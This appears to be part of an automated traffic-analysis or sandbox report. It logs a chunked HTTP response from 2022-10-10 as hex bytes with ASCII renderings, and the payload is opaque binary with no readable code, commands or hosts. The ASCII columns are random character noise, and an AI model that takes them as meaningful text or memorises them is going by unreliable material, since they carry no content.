                  Data Ascii: 2000Av6~g&f~9iOf?@;Py7M+.R<g.|cIr<!}sp_r:KXm"o2wA!Q%ZN1 +0U.I&|X&,SQsA@=.]4-fr$UoX:i5)[.%G!I-wvw7%qTL1
                  2022-10-10 21:21:48 UTC199INData Raw: 21 23 39 90 26 c2
                  Data Ascii: !#9&
                  2022-10-10 21:21:48 UTC199INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC199INData Raw: 31 66 66 38 0d 0a 3e 90 de 6b 17 00 be 08 5a 72 e7 07 fa fe 61 ca a9 9e 76 81 6c 89 80 10 bb 73 78 78 ad c3 62 e0 ea c2 38 88 00 cf da 21 6f 47 ae 7a e6 83 74 02 6f b5 75 27 f8 86 d9 a4 20 e1 72 c8 e1 62 2e 6e f2 79 4b 78 9f c1 f4 6f dc 82 f5 36 9e b8 cd d9 41 18 9e 84 6a e7 e1 04 e4 d7 86 73 b4 78 d0 cc 16 4b 53 84 97 a1 72 69 7f ed 4f 7c a9 de 7f e9 28 59 f9 37 81 eb b6 c4 89 fd 85 79 70 92 77 8b 1c 01 71 47 7f bb 2b c4 66 db da 21 53 ab a9 16 67 ad f2 10 13 d8 b8 a0 dd 64 8c 6c 8c 94 bf fa 51 2e 72 05 3a 0e 49 7f df e1 72 b4 25 50 0e 0d 67 f4 e6 7a e5 42 d9 61 3a 3d 33 ea 32 dd 23 73 51 96 b8 6c 43 e7 f2 61 58 d7 38 63 c0 8e 72 49 23 a2 ff 2e 51 41 ec 9b 90 43 18 14 8b 8c 44 0a e4 b7 c6 a4 c9 3b 82 39 61 74 fa 53 e3 d8 f9 51 ee e7 8a ca 32 cd 55 af 2a
                  Data Ascii: 1ff8>kZravlsxxb8!oGztou' rb.nyKxo6AjsxKSriO|(Y7ypwqG+f!SgdlQ.r:Ir%PgzBa:=32#sQlCaX8crI#.QACD;9atSQ2U*
                  2022-10-10 21:21:48 UTC207INData Raw: 32 30 30 30 0d 0a
                  Data Ascii: 2000
                  2022-10-10 21:21:48 UTC207INData Raw: fb ce 1c 1a 99 19 ab f4 d5 63 de cf e1 17 72 24 db 91 b5 3f f7 bd 0b 0f fb 19 33 f8 71 b2 3a 03 b7 7c 63 89 f9 98 eb 46 1e b0 a2 a9 e0 f4 4a 7a 31 df 0f 2d 43 d9 eb 6f c0 73 02 39 43 08 e6 7a 70 31 6e 42 1a 08 60 fe ef f6 d7 7b cd 8a 84 7d b7 5e 3b 51 22 65 10 52 72 d4 31 a0 ef e4 77 b2 d8 75 bf 1c b3 bf 2a 1b 32 f4 44 fa 1d d1 b7 46 87 67 29 56 2b 4c 85 16 d8 a2 2c cc 0f 9b 67 f4 ac 52 32 db 84 40 51 a4 59 64 65 ed 0c 3c 25 5e e6 bc 4a f2 79 e4 36 03 58 bb f8 47 4e b7 08 cb 39 49 93 6a c2 0e 79 98 79 95 81 88 89 12 91 f8 6c ad 63 fb 1d d1 a2 91 6e 68 c6 0a ea be 60 3a 86 30 5f 13 ab 0c 35 0f 4e 46 46 e4 e1 ca 12 4a ea ff dd a8 27 f0 96 67 50 85 ef d6 3f 10 62 41 49 d9 c9 bb fb 6e 0e a7 de 7a 6e f2 b6 2f 83 d0 14 ec 42 08 9c cf 0e 36 0d 75 a0 13 38 af a8
                  Data Ascii: cr$?3q:|cFJz1-Cos9Czp1nB`{}^;Q"eRr1wu*2DFg)V+L,gR2@QYde<%^Jy6XGN9Ijyylcnh`:0_5NFFJ'gP?bAInzn/B6u8
                  2022-10-10 21:21:48 UTC215INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC215INData Raw: 32 30 30 30 0d 0a be 64 5f ba 39 c7 2f 93 6b 44 71 60 97 a3 a1 45 31 68 a0 c5 88 29 d1 12 96 08 04 9a e5 3f 32 e7 a4 f1 b6 0f d9 88 18 59 b1 5a 03 c5 13 d8 9a ae 6a d6 15 63 df 3e 85 4b 94 cf a8 7a d8 58 42 9b 66 07 ad d3 94 45 ab 08 e2 d8 50 82 6f d0 8a 34 f1 02 7d d1 ab 68 7e 10 1a b5 8c b2 f9 3f b1 54 07 2a 3e c1 1c 3d 3f 8f c6 2b 6e 8b 2f 8e f7 e7 4f be 73 a6 3f 29 64 6f 11 27 99 55 e6 1c d5 02 6b 5e 82 1a 91 37 b3 0a a1 19 27 ea 67 a9 0d 63 d3 83 85 3e 42 22 de 57 d3 e2 59 60 fb 4d 99 08 32 7d 2e 2d d2 a1 4e ee 72 a7 f5 66 85 9c 51 3e 27 0a 42 ef 9b c9 c9 c6 ce 35 f1 ed 22 06 b3 01 42 78 62 5e 48 18 40 70 84 af ca 3b 02 0a 6f e6 be b2 79 b7 f5 0c 70 69 9e bd 0a e4 5f fd 65 6e e0 9d 7d b0 a9 a7 a3 84 34 ae fc 6f 27 a9 b4 9d 8c 70 d5 9f d8 4d e1 38 05
                  Data Ascii: 2000d_9/kDq`E1h)?2YZjc>KzXBfEPo4}h~?T*>=?+n/Os?)do'Uk^7'gc>B"WY`M2}.-NrfQ>'B5"Bxb^H@p;oypi_en}4o'pM8
                  2022-10-10 21:21:48 UTC223INData Raw: c4 48 e8 b8 89 a0
                  Data Ascii: H
                  2022-10-10 21:21:48 UTC223INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC223INData Raw: 32 30 30 30 0d 0a 64 11 e5 b2 f0 e0 fe 3d b6 68 27 72 b3 45 72 f9 3d 9e 73 06 2b bc af 42 e6 a7 c2 c7 48 58 01 f1 1f 23 18 8e 2b 48 17 b0 ff fc 6e 56 34 34 ef f9 b4 7b 3c 33 97 f9 14 37 d1 53 aa 9f a0 9f 09 fc 29 26 d2 54 7a e4 4f 62 23 ec 3b 81 e1 f9 87 2e 5c d0 4d 2b 0a be 6b ad 5a 8a 08 ee 6e d0 d6 79 80 b5 e0 01 d6 98 b9 d7 d1 e8 fc b7 a2 3c 31 a9 f5 26 3a c3 c4 f8 87 cf d7 34 cc 08 cb 93 c9 74 8e 6e 0b 02 8f 7d e6 89 97 8b c8 57 83 cc 23 e0 53 f8 a0 c7 c2 e5 a1 dc d1 0f 51 36 ce 9f 42 eb 6c 4d 34 cc dc 43 3f e7 4f c9 6a e3 e6 3e 32 71 a3 18 36 29 8a cf 3b a3 f3 99 d2 87 bb df d0 1e 4d 96 af f8 5b a1 32 c2 00 25 0d d0 59 b5 d8 fa 72 a3 66 ad 6d f4 e2 ab 40 67 e5 ee aa b4 65 c0 ea ed c0 a2 7e 53 6c 52 1c 1d 4a 01 fd f6 d5 24 3c 99 e5 90 79 ae f0 9b bf
                  Data Ascii: 2000d=h'rEr=s+BHX#+HnV44{<37S)&TzOb#;.\M+kZny<1&:4tn}W#SQ6BlM4C?Oj>2q6);M[2%Yrfm@ge~SlRJ$<y
                  2022-10-10 21:21:48 UTC231INData Raw: d0 60 4e ed 2f 0f
                  Data Ascii: `N/
                  2022-10-10 21:21:48 UTC231INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC231INData Raw: 32 30 30 30 0d 0a c9 f0 ef f4 bf cf ad 70 b3 1a 84 ff 97 38 52 22 c6 6a fe fd f5 da a9 fc 19 50 75 43 2b 42 ad 52 55 cd 3d ad 21 9e 5d af 08 a6 3a f1 5c 9d cf f1 71 5e 1c fe 62 d2 b6 fd 85 f5 90 95 d0 b0 93 9a 69 6b 2d f0 ee 5e 0f b4 69 92 d9 18 5e 74 ae a8 f4 66 80 6d 35 ee 76 1f 7f ae 86 28 71 e4 9e a4 e8 44 ca 16 20 70 65 55 00 22 7e 20 19 e8 06 3f 6f 5c 72 89 cb d6 5a 71 27 2d fd b1 df fb c2 b5 af 4c 18 1b 08 fc 79 7b a3 27 81 b6 e6 19 bd 28 26 f6 eb c3 ef 03 40 31 ae a6 02 f3 3f b8 92 63 a2 1e 8d 4a 32 ed d4 99 45 81 51 40 b5 23 78 99 06 cd 04 b3 64 76 df 52 5a 30 27 15 41 41 b1 7e a9 a4 b9 60 c9 55 b0 1a 9e 88 ba e5 60 12 0e 1e 7b a6 35 60 1b 61 a5 06 55 fb 96 8b 50 43 01 5d 8c 6a 84 6e 76 e5 74 1f 30 fa cd 84 01 44 14 7e 26 11 df 03 c0 37 89 a1 58
                  Data Ascii: 2000p8R"jPuC+BRU=!]:\q^bik-^i^tfm5v(qD peU"~ ?o\rZq'-Ly{'(&@1?cJ2EQ@#xdvRZ0'AA~`U`{5`aUPC]jnvt0D~&7X
                  2022-10-10 21:21:48 UTC239INData Raw: 0e 17 73 c1 f7 3f
                  Data Ascii: s?
                  2022-10-10 21:21:48 UTC239INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC239INData Raw: 32 30 30 30 0d 0a 5a 5e f9 c9 1e a0 c3 51 95 13 a6 0d 46 8b 90 67 6f 08 53 e3 6b 1b cf b8 00 cd d3 01 f8 7b 5f e5 90 14 13 0d 47 2a 8e 17 31 f2 85 24 bf 90 b1 fa 79 32 f7 85 d4 cd 66 8f 82 63 db f2 30 31 7b d9 01 1c 29 32 63 34 65 2c b8 4e 86 ed 43 61 30 ad e6 b3 72 01 f1 e7 c1 dd 72 ce ab 93 d3 5a 0c 2e db 9a a1 9e 87 dc fd 43 37 64 22 8e 7a d3 2d e7 85 76 04 70 22 16 88 d6 f4 97 fd 04 a4 35 53 e0 89 c2 08 6e 87 3d 8f 45 a3 c9 37 57 d8 15 30 3b 8f a7 20 a8 3b 74 cf 34 0c 86 d4 cf 6a 6c 07 21 77 ed c0 fb be d7 45 4a 5a ab 60 a9 84 32 4b 20 b2 b1 93 d7 50 08 a0 d0 56 78 76 91 10 c4 db 72 03 0a 43 92 a1 c1 2b ad d8 2a b2 7b bc 05 bb 3b ba e0 c7 ae 4b 0b f4 53 12 2d 45 62 b6 6f 00 3c 00 e3 b3 93 7b c6 7c 3f f6 e8 6d 98 bb bc 47 5d 16 dc 51 b0 74 8e 3d c1 47
                  Data Ascii: 2000Z^QFgoSk{_G*1$y2fc01{)2c4e,NCa0rrZ.C7d"z-vp"5Sn=E7W0; ;t4jl!wEJZ`2K PVxvrC+*{;KS-Ebo<{|?mG]Qt=G
                  2022-10-10 21:21:48 UTC247INData Raw: 5b 73 ef 4d c4 30
                  Data Ascii: [sM0
                  2022-10-10 21:21:48 UTC247INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC247INData Raw: 32 30 30 30 0d 0a e2 94 20 bd 2e 2f f5 d9 a2 df 5a d8 3e 7e 5d 7e 2e 6e 7c b4 2a 65 8d 2e 00 45 b3 68 d6 ff 3a a1 79 c9 e6 0f e6 1f 72 7e 9f 14 51 98 7d aa 5f 55 92 21 93 02 79 45 e8 b2 f0 39 f9 ec 68 8d a6 a7 94 fa ae c1 ba 3c d6 cc 97 a1 17 3f 94 b2 65 f5 93 c4 5c 80 1e 7d 3e 10 51 b9 b4 98 fc b6 85 4f e6 0f 40 38 4b da 56 f0 a8 f3 9f 74 a7 9b 7f a2 97 08 fd 3b 2e da eb bb 86 da 92 1d b6 c3 cc 7d 7a db 09 d7 5f 4f 22 9c ac 83 05 45 a7 8c ad f2 6a 0d ae 14 c0 2e 9a 16 b2 36 df 38 75 f2 b5 af bf 81 26 36 12 80 59 6d fe 32 9d dc 79 7b 84 ba fb 8d 2c 49 86 a4 d8 cf 98 df 5e 9c 4c f6 23 e9 49 3f 95 e7 63 53 0d e2 fc fe 49 88 8c 29 82 22 66 f8 ce 19 9f 1c 95 75 2a 88 96 8c 94 0d 84 8f 2c e9 32 e2 9b 7c b6 6b de 67 e2 e2 d8 74 22 ed c9 5d 4e d4 40 b3 6a 40 29
                  Data Ascii: 2000 ./Z>~]~.n|*e.Eh:yr~Q}_U!yE9h<?e\}>QO@8KVt;.}z_O"Ej.68u&6Ym2y{,I^L#I?cSI)"fu*,2|kgt"]N@j@)
                  2022-10-10 21:21:48 UTC255INData Raw: 48 1c 85 39 a3 c1
                  Data Ascii: H9
                  2022-10-10 21:21:48 UTC255INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC255INData Raw: 32 30 30 30 0d 0a d3 49 1d 30 cc 13 9a bd 45 69 ce 09 a3 39 f0 bc 81 4e 62 15 b5 75 85 43 dd 60 67 09 3d 72 e5 3a 8e 5e 46 34 2b 55 c3 8c 6f d2 b5 de e3 2b 98 3e 8c 00 92 30 dd c8 dc f8 80 59 f0 34 a4 59 ce 79 31 27 d0 87 5c 20 fa f9 97 cf 6c 04 9f e3 23 20 16 58 0a bf f3 77 84 e9 4c 94 a9 a3 0a bd e2 d5 f9 8a a3 db 93 64 12 86 fa f8 87 b8 d2 d9 e3 5b 5f a3 9e 6f a8 41 f5 48 ec de bc 23 fd a9 ee 93 ba 46 12 2f 10 1b 75 7c 10 54 ff ea 08 a7 55 69 0e 5a e0 4b 9b 74 f6 50 43 c1 74 15 d6 3a aa ee dc e2 35 87 c7 5b 0a 67 9f 9a 15 4c b3 af d2 31 87 05 9b 33 02 41 52 a5 34 22 e9 01 86 1b 27 e9 06 a5 0d 2f 6d af ab 95 3d 33 bc 57 d7 79 da d9 c5 da 1a ad 39 27 68 71 a3 d4 42 ea 1b a3 ce 1a fa 21 e8 69 5c 42 06 aa 55 02 d5 0a 04 93 71 e7 71 8d 36 50 42 53 0f bf 6c
                  Data Ascii: 2000I0Ei9NbuC`g=r:^F4+Uo+>0Y4Yy1'\ l# XwLd[_oAH#F/u|TUiZKtPCt:5[gL13AR4"'/m=3Wy9'hqB!i\BUqq6PBSl
                  2022-10-10 21:21:48 UTC263INData Raw: fa 86 8f c8 90 78
                  Data Ascii: x
                  2022-10-10 21:21:48 UTC263INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC263INData Raw: 31 66 66 38 0d 0a c4 2c 3b b2 0c bb ff c4 ec d6 ea 4a 74 f3 d3 c2 95 fa a3 08 ce f7 7b f4 dd 76 1e 55 b9 4d a1 69 10 e4 57 d6 e7 39 16 ed 1b c1 e0 25 90 7d 3d 24 f3 61 b3 67 d0 dd 93 b4 bd 02 db 80 77 a4 d2 34 75 24 23 b6 bc 07 5f e0 17 89 13 9d c8 ef a5 0a 8a 0b 05 ee 7d cc f6 73 0c 10 82 bc e0 66 cf ec 3d 40 0f 81 17 06 eb e0 48 f2 48 76 30 cd d4 24 b9 7d 8c e3 fb c6 0c 74 b7 6f e9 0e 29 14 5d 3b 37 67 99 6a b0 79 ba 33 2a cf 89 b1 59 51 d1 4c 15 40 01 a1 c5 cf 94 9d 7e 8b 84 6f 3f ab 07 b5 30 31 af 82 e0 bd 36 12 d8 ae 96 59 9e 62 cd d7 dc a0 62 f4 56 1a 2b ff cd 59 76 d6 c0 22 69 bb b4 d6 03 de 3b 75 7c 4b 04 6d 89 3c d8 11 96 46 c9 40 0c 3e 5f 1f 71 17 ac ed 2c 9c 8e 5f 94 c4 de b4 2b b2 76 2f c8 a5 80 08 f5 e6 e6 13 81 64 f2 42 16 bc 65 db 25 2f ec
                  Data Ascii: 1ff8,;Jt{vUMiW9%}=$agw4u$#_}sf=@HHv0$}to)];7gjy3*YQL@~o?016YbbV+Yv"i;u|Km<F@>_q,_+v/dBe%/
                  2022-10-10 21:21:48 UTC271INData Raw: 32 30 30 30 0d 0a
                  Data Ascii: 2000
                  2022-10-10 21:21:48 UTC271INData Raw: ab ac 58 61 3e 8c ff 84 70 b5 5d d4 9d 11 be a0 1b 79 fd 47 c8 a9 c9 97 12 51 72 74 8f d5 05 59 ca e7 7e 45 b2 bc 59 f0 db 2c c9 51 c4 99 19 2a c9 d9 be 33 b6 07 bc 88 17 e2 96 a6 5a e3 b9 7a 3b 34 da c9 38 68 a1 db 33 87 15 da 66 cb e6 0f 76 03 d3 3a 1e 0a 86 d9 09 49 5a 6c 33 ca 8c 53 c1 a6 05 fc 6e df 4e f3 86 12 63 b6 c1 6c 1b 94 28 e8 29 b8 cb f0 5b fd 3f a9 f0 bf 18 85 92 50 f7 4d 9a 6a eb 28 db af 10 44 51 ab 7c 21 dd 9e cc a8 3f 38 2c d6 5e 32 74 07 d8 17 06 a3 56 98 b1 b6 df 4a 27 63 df c3 fe 76 20 11 1f 0e 9a 3b c3 7d 85 70 b0 bc 78 49 89 5b 19 18 46 dc fe 40 08 17 d4 17 f1 69 12 57 06 03 07 20 74 ea 32 03 c3 05 33 00 a7 ec 23 48 21 50 0c c4 b6 b4 39 3c f7 29 22 33 34 18 77 5e a1 58 dc 3d 75 4c bf 9f 9a 13 86 1f b5 24 f7 36 da 37 64 9e 64 20 4a
                  Data Ascii: Xa>p]yGQrtY~EY,Q*3Zz;48h3fv:IZl3SnNcl()[?PMj(DQ|!?8,^2tVJ'cv ;}pxI[F@iW t23#H!P9<)"34w^X=uL$67dd J
                  2022-10-10 21:21:48 UTC279INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC279INData Raw: 32 30 30 30 0d 0a 21 37 5f 80 e3 83 8a bd 73 eb d0 28 d1 20 02 8b a4 c3 c3 9f de f2 9b 15 b6 95 b0 8f 24 ad 0f b9 6f a8 28 d4 4a 84 05 76 a9 ef 85 b1 fb f3 9a 5e 74 7a 09 5c 44 15 de 63 1a 26 69 ac 1c cf d2 06 3a 8c 5b ac 85 84 c6 34 07 fe 91 76 8c c4 dd 46 f8 96 95 0b 6a 26 d2 03 4b c7 93 9d b9 b1 b3 dd 1f f2 51 03 28 10 a5 c7 09 cd 72 6f 46 25 61 a4 34 dd 0f 8d 24 50 1a 8a 05 58 b9 6f 55 ae c6 3d c1 2d bd 97 38 7b 36 f1 75 7f ba c8 80 6d d2 14 da bd e4 d9 5a e1 58 ca a9 f9 a7 c1 ec 29 61 60 87 e0 bd f1 60 e4 ad 2b 24 c4 ad 25 d1 2f 04 9b 0e ec 82 39 e0 f9 77 06 0f a4 96 2e aa fe 2e d7 94 bd 89 30 a9 ee 26 56 1d 32 77 25 27 b8 d7 55 55 88 26 94 09 b8 65 33 29 80 9c 6a 41 c9 ae 38 0c 0f 1e 85 f0 e8 16 a3 16 5d 29 50 7c 1d 8c 32 99 67 d8 2e 8a 36 6b 02 94
                  Data Ascii: 2000!7_s( $o(Jv^tz\Dc&i:[4vFj&KQ(roF%a4$PXoU=-8{6umZX)a``+$%/9w..0&V2w%'UU&e3)jA8])P|2g.6k
                  2022-10-10 21:21:48 UTC287INData Raw: c9 6b 1c 79 8b d5
                  Data Ascii: ky
                  2022-10-10 21:21:48 UTC287INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC287INData Raw: 32 30 30 30 0d 0a bb f6 8a 68 6f 6c f3 00 fd a9 bf 27 43 44 3c 33 ed b7 7a 15 0c 4b c7 c8 1a 1f c8 b2 0e de dd 87 d9 15 31 a3 1d 84 4b b3 cf a7 4a 61 03 d6 37 34 2b 3b c0 7d 06 63 30 16 1a 5a ed 6c 4d df 48 f5 b8 99 54 f7 50 2b 2a 21 37 54 8c 6c a2 66 cd 9b 59 ca 8c 17 e3 36 fd 9a 1e 80 0e fb 1f 4e 30 d1 7b 74 a2 f4 c6 14 07 7c 1f 61 e8 f9 61 6e cd 91 71 79 7a 5e d4 bb 56 7d 13 92 c9 01 e0 a4 72 2d c5 65 96 04 d9 46 71 64 ca a4 fb c3 38 95 f0 f3 8c 0c eb 3d c1 eb 3d f1 9d 94 3a 08 1c 62 4a 7e 35 25 a4 bb e6 d1 9b ea c2 b1 08 46 73 99 4c fc 1c a3 30 9a b4 72 41 d2 5f ba f1 9c 7e 85 48 c2 68 d2 ba 27 b2 d7 99 ee e4 5b eb 71 b6 56 af 80 b3 d4 de 45 82 ac 52 c5 c4 6f 56 03 06 5a 8d 33 21 a0 41 71 bd 15 dc 6e 5c a6 83 6f 89 fd 35 2e c5 64 c4 d9 5b cb 18 58 1e
                  Data Ascii: 2000hol'CD<3zK1KJa74+;}c0ZlMHTP+*!7TlfY6N0{t|aanqyz^V}r-eFqd8==:bJ~5%FsL0rA_~Hh'[qVERoVZ3!Aqn\o5.d[X
                  2022-10-10 21:21:48 UTC295INData Raw: ba f3 fd a4 4e 76
                  Data Ascii: Nv
                  2022-10-10 21:21:48 UTC295INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC295INData Raw: 32 30 30 30 0d 0a 3b c9 70 6d a9 2c 07 b3 bd 8e 26 a8 ba 2f 06 5c 6a 90 eb 92 71 fe 66 41 55 e9 d4 e7 03 ff 10 11 a1 a2 d2 ab 66 fa c7 34 01 91 0b 29 9f 5e c6 95 6c 3b 57 3d d2 4d ee c9 c8 9d 79 28 48 31 36 68 7d 57 f4 d6 f5 9f 41 e2 4f 0b 9a 51 c7 91 22 14 75 d5 c3 d9 7e 28 04 64 27 9d 5d 81 c2 19 43 91 11 59 94 7f 62 51 9d c0 97 ea 46 a9 ba 32 d1 42 cf 76 41 25 86 8d 5e 7f 0a 18 f5 4d 7f 64 b1 e0 16 91 ca a9 fc cd 23 f4 d6 5a 76 b2 35 c4 92 6c 87 71 24 6c ea 68 36 07 22 66 93 2b 11 6f a5 5e 19 b4 98 f1 de 3b cb 3d 0f 26 b2 bc bd 52 7b 86 cd 25 f0 fd bf 41 a9 38 24 da 3c 22 ee de 8f 96 45 28 4e 27 77 fd b0 cb 36 88 02 67 c5 a6 6f 13 fa c1 e7 b1 13 92 4d a6 1a de fc ca 70 d5 c2 8c 69 ab 86 93 67 b4 e2 b6 9f 35 8f 67 58 b2 8c 19 4c 54 d4 b1 34 8a 64 82 7e
                  Data Ascii: 2000;pm,&/\jqfAUf4)^l;W=My(H16h}WAOQ"u~(d']CYbQF2BvA%^Md#Zv5lq$lh6"f+o^;=&R{%A8$<"E(N'w6goMpig5gXLT4d~
                  2022-10-10 21:21:48 UTC303INData Raw: a6 9d 1a fe de cb
                  Data Ascii:
                  2022-10-10 21:21:48 UTC303INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC303INData Raw: 32 30 30 30 0d 0a bc a1 e7 db 68 48 e2 61 4a 46 6a 08 e3 00 bf a4 b3 c4 2a 58 82 ad 8b 6f c4 a2 e9 61 58 bb 31 47 4f 0c 51 cc d1 d7 29 cc f1 94 24 3f a1 f7 22 70 ce b1 9f 7d 65 e4 b4 74 79 5c 76 a2 71 a9 49 e5 ec 83 86 5f eb 20 72 02 af 8c 8c 0f 96 54 d4 b2 6f d4 5f 54 c6 7c 40 e3 87 1c 5d 48 98 d8 fe 99 d1 80 d0 57 24 98 8d 74 a0 ca 1e ae 36 a2 18 f3 12 a3 73 8d b5 c2 46 cb 7a b8 17 83 be 10 10 1e 1f be 83 48 4a 7e 4c 96 11 b9 b8 22 62 4f 07 e7 52 7d 8e 45 c9 68 b0 3a 88 21 ed 95 7a a4 67 a2 d8 47 fd 76 3e 8b 50 d3 a0 22 d8 4c 54 36 d0 d4 d4 2e 54 91 31 75 51 2c 8d ab 3b 07 b6 d8 1e 82 41 6b 29 fd 86 2d 73 7d 24 55 c5 9a 35 c9 91 91 66 48 ca 99 4c e4 1b cf 68 b4 99 45 5f 18 a6 a2 e1 57 0c 89 9b 4d 86 44 5e 37 04 70 9c 08 eb d5 63 9a 3b 70 ca 14 1d 79 37
                  Data Ascii: 2000hHaJFj*XoaX1GOQ)$?"p}ety\vqI_ rTo_T|@]HW$t6sFzHJ~L"bOR}Eh:!zgGv>P"LT6.T1uQ,;Ak)-s}$U5fHLhE_WMD^7pc;py7
                  2022-10-10 21:21:48 UTC311INData Raw: 8b 66 fa d4 f9 ff
                  Data Ascii: f
                  2022-10-10 21:21:48 UTC311INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC311INData Raw: 32 30 30 30 0d 0a 02 86 3f 15 a0 52 49 9e d7 48 94 a5 16 e5 b2 0c 3c d4 b6 f6 65 65 da 17 da 1d 06 4c c2 a3 10 21 85 f9 bc 24 ff 83 61 65 e1 20 d8 8e 6b ab a5 e0 5b ac 74 dd fd f8 eb fc 32 5e e4 04 9a 02 ed 1b 89 56 1f 13 61 5a f3 8c 21 85 25 b7 51 30 c2 90 24 73 45 f0 95 63 5f 21 59 1a fd 13 a4 b0 5b 14 6a 87 49 42 db 64 6a b9 25 39 c3 56 35 37 9f 46 9d 26 11 20 a6 a1 81 6e ed 98 7b 29 4c 35 72 be 33 82 e8 3a e5 d2 1e e4 fb 91 da b1 24 28 ee f7 13 80 c3 a7 92 0b 21 a3 d0 84 78 df 53 27 c2 ed 78 1e 53 4f c5 6b 11 be ab ae 71 39 85 62 83 be 22 b8 83 c8 f4 d4 68 3f b1 e9 b9 f5 f1 a9 cb 06 83 e0 d9 46 85 36 b9 32 44 29 7d 51 4d 7f 6a 20 56 2a 83 46 b5 d0 c2 d6 f5 72 45 58 b0 ae ca 70 3c a0 1d 9d b2 ac 65 a9 bc e9 c6 86 b4 c4 7d 16 cc e6 11 92 08 58 39 90 fb
                  Data Ascii: 2000?RIH<eeL!$ae k[t2^VaZ!%Q0$sEc_!Y[jIBdj%9V57F& n{)L5r3:$(!xS'xSOkq9b"h?F62D)}QMj V*FrEXp<e}X9
                  2022-10-10 21:21:48 UTC319INData Raw: 8c 1d e5 28 40 15
                  Data Ascii: (@
                  2022-10-10 21:21:48 UTC319INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC319INData Raw: 32 30 30 30 0d 0a 79 c6 99 a6 d8 35 4e b7 6a 06 d1 22 7c 88 1d c7 0f 32 11 e5 1b 98 35 b7 ed 8e 44 0a 3b 79 d0 a9 29 4a 25 b1 81 fd 70 ea bd 28 08 4e fa 15 b3 52 ae c6 dc 57 fd 04 96 15 b7 97 7f 6d 99 18 01 a6 c1 96 c9 79 e7 a1 e2 8f 09 d1 49 37 e2 10 29 b3 f2 f8 4e 53 bd e1 66 9f 80 c0 ea 6c 10 ba 2a 30 03 24 bf b8 13 a0 57 08 9a 80 4a 4b 47 56 a5 a7 d1 f9 03 4f ec 38 d4 c7 ca b6 80 03 76 0e 45 60 11 0d 25 a0 3a 7e 5a a3 6e 6a 9a b4 e8 ba 84 4d 64 c4 a7 7d 73 7a b1 1a 45 cc c3 90 ac 60 b5 5e 93 48 d2 75 d2 1b 61 9b b9 2f 23 67 d0 5e ca 49 27 ae 49 4b 4d 0b 98 6f ea 74 1a a9 4e 8f a3 36 ae 8d 8f 01 a1 3d cf 56 d8 71 12 17 d0 d4 2d c5 7b 94 b3 3d 1f 4f 1e 63 62 42 39 08 68 e9 0d f9 ae ca ee 62 bc 0d 59 91 43 f5 84 04 dd 96 af cf 6a 99 c4 d1 e4 b3 e5 86 7a
                  Data Ascii: 2000y5Nj"|25D;y)J%p(NRWmyI7)NSfl*0$WJKGVO8vE`%:~ZnjMd}szE`^Hua/#g^I'IKMotN6=Vq-{=OcbB9hbYCjz
                  2022-10-10 21:21:48 UTC327INData Raw: 97 ef 3d f0 4d 63
                  Data Ascii: =Mc
                  2022-10-10 21:21:48 UTC327INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC327INData Raw: 31 66 66 38 0d 0a ad 39 a4 c1 62 0d fb 20 4c cb 9c c0 ab da be af 0b 32 55 94 e8 9a 2f 98 b8 05 31 db 2d be e1 32 07 c9 aa 21 33 95 19 e0 ef 7b 31 86 b4 0e c2 b0 dd ec 07 f8 53 0b 1a 1e ba 75 13 51 a2 3f a1 7f 38 79 f2 c1 f7 08 4c 1c 30 05 0d c0 1a 9b 11 90 f6 cb e0 e6 34 d4 a2 64 d6 5a 23 d2 3f 0a c8 fb 7b 66 d8 e2 6d 57 81 11 be 58 e1 ab 80 55 aa 25 94 f4 ad e7 51 21 74 e3 18 81 fe 33 7a e3 15 cb b3 94 c9 17 91 5d 4f 35 e3 96 ea c3 f7 f9 be 4c bc 05 fa 4b 42 e3 77 53 ec 0f 6f 6c 6e 5e e3 97 53 be 13 88 e4 74 4d 50 1b 68 f3 9a 6b cf 50 b3 65 9e fd 6a c5 b9 cf be e4 62 3a 5d 47 4a 59 81 9a 11 db 06 a2 72 7f 97 4a 32 e7 46 4b 35 27 72 51 5c e0 d6 8d 0f 26 1c e1 8f 64 13 e5 3e 60 34 89 0c 4e 95 42 03 2d 11 a3 76 70 3b 2f ae a4 ee d9 bf 48 68 59 c0 e6 24 16
                  Data Ascii: 1ff89b L2U/1-2!3{1SuQ?8yL04dZ#?{fmWXU%Q!t3z]O5LKBwSoln^StMPhkPejb:]GJYrJ2FK5'rQ\&d>`4NB-vp;/HhY$
                  2022-10-10 21:21:48 UTC335INData Raw: 32 30 30 30 0d 0a
                  Data Ascii: 2000
                  2022-10-10 21:21:48 UTC335INData Raw: 8d 5d 25 9c 36 51 b3 ec ff dd ea 33 2d 2f c7 e9 f5 62 40 cd b6 2f e1 15 83 40 36 d7 f4 85 dd af 46 4a 91 0e 73 52 db 55 f3 c9 7b a2 67 6e 56 a1 7a 1b d8 b3 2a 45 f4 ce da 60 70 3b 93 df 80 56 be 3d ae f1 b3 79 0a fa 80 b2 f5 ce 34 d2 26 3a d3 4e 31 45 18 78 4c ff 94 af 54 5d fd 1d b3 b6 33 10 cc 11 7e 32 52 7b 92 ec 36 c6 28 3e 90 b2 9f b2 77 fb f9 ef fd 5c cb c5 95 e5 10 33 0a ed 50 ef 1a fc c4 a9 eb 9f 21 36 09 35 cc f2 fb 1f eb fd 3f 09 d3 e2 6f 85 63 b2 b5 d0 33 ec f5 f1 57 35 40 cc ac 71 9d 5b f9 e9 7a b0 f6 dd 49 88 6f 3f 2f 68 57 15 f0 32 3a 95 59 77 c8 bb f7 5c 0e 12 c2 7f 24 1d 6c b5 0f da 22 df c9 91 ae 45 8d 66 37 e0 12 96 7f a1 ba 97 